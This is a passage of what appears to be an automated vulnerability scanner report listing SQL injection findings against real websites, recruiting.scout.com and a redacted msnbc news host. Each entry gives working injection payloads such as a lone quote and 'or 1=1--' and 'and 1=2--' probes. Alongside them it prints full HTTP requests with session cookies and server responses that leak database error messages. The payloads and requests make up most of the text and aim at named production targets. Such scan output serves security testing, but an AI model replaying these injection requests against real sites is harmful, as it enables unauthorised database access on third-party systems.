Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:02:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 212531

<!-- An exception occurred. Described as: Unclosed quotation mark after the character string ',null,2011,null,null,null,null,null,88,null'.--><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict
...[SNIP]...

1.75. http://recruiting.scout.com/a.z [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the pid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /a.z?s=73&p=9&c=4&pid=88'&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 29 Jan 2011 23:52:12 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 72 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:02:12 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 11806

<!-- An exception occurred. Described as: Unclosed quotation mark after the character string ',null'.--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1
...[SNIP]...

1.76. http://recruiting.scout.com/a.z [yr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The yr parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the yr parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /a.z?s=73&p=9&c=4&pid=88&yr=2011' HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:52:22 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb4
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 100 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:02:22 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 16943

<!-- An exception occurred. Described as: Unclosed quotation mark after the character string ',null,null,null,null,null,88,null'.--><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"

...[SNIP]...

1.77. http://technolog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 38908709%20or%201%3d1--%20 and 38908709%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?138908709%20or%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:37:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 143999

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1916431175&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;58:58:178;53:9:80;86:86:270;87:87:209;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1916431175&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;58:58:178;53:9:80;86:86:270;87:87:209;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrolo
...[SNIP]...

Request 2

GET /?138908709%20or%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 02:37:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 143987

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1849587176&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;58:58:178;53:9:80;86:86:270;87:87:209;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1849587176&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;58:58:178;53:9:80;86:86:270;87:87:209;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrolo
...[SNIP]...

1.78. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/16/4904611-north-korea-welcome-to-twitter

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/2010%20and%201%3d1--%20/08/16/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=223093804&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=223093804&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /_news/2010%20and%201%3d2--%20/08/16/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1754540373&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1754540373&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

1.79. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/16/4904611-north-korea-welcome-to-twitter

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 17360674%20or%201%3d1--%20 and 17360674%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/2010/0817360674%20or%201%3d1--%20/16/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39897

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=823962262&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=823962262&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /_news/2010/0817360674%20or%201%3d2--%20/16/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39909

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=906723894&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=906723894&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

1.80. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/16/4904611-north-korea-welcome-to-twitter

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/2010/08/16'%20and%201%3d1--%20/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:36:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39907

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1838711579&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
